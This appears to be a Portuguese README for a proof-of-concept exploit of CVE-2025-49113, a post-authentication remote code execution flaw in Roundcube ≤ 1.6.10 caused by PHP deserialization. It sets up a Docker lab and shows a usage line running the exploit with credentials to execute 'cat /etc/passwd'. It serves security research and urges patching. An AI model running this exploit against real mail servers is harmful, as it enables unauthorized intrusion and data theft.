
Exploit RCE pós-autenticação para Roundcube ≤ 1.6.10 via desserialização de objetos PHP, com ambiente de laboratório baseado em Docker e artigo técnico para pesquisa e educação em segurança.
Uma vulnerabilidade crítica de Execução Remota de Código pós-autenticação foi descoberta no Roundcube (versões ≤ 1.6.10), causada por desserialização insegura de objetos PHP. Esta grave falha persistiu silenciosamente na base de código por mais de 10 anos.
Para a documentação técnica completa e detalhes de exploração, visite:
👉 https://fearsoff.org/research/roundcube
Isto instalará Ubuntu 24.04, Roundcube e todas as dependências necessárias dentro de um container Docker:
docker run --name ubuntu24 \
-p 9876:80 \
-v "$PWD/rc_install.sh":/root/rc_install.sh \
-it ubuntu:24.04 \
bash -c "chmod +x /root/rc_install.sh && /root/rc_install.sh && exec bash"
⚠️ Nota: Utilize apenas em ambientes isolados. Não exponha instâncias vulneráveis à internet pública.
Este código de prova de conceito é fornecido apenas para fins educacionais e de pesquisa. O autor e colaboradores não assumem nenhuma responsabilidade por qualquer uso indevido ou danos resultantes do uso deste código. O uso não autorizado em sistemas que você não possui ou sem permissão explícita para testar é ilegal e estritamente proibido.
Certifique-se de ter o php instalado no sistema
php CVE-2025-49113.php http://127.0.0.1:9876/ roundcube fearsoff.org "cat /etc/passwd > /tmp/pwned"
Se você está executando Roundcube ≤ 1.6.10, atualize para a versão corrigida mais recente imediatamente para eliminar esta vulnerabilidade.
Este projeto e documentação associada são fornecidos sob a Licença MIT.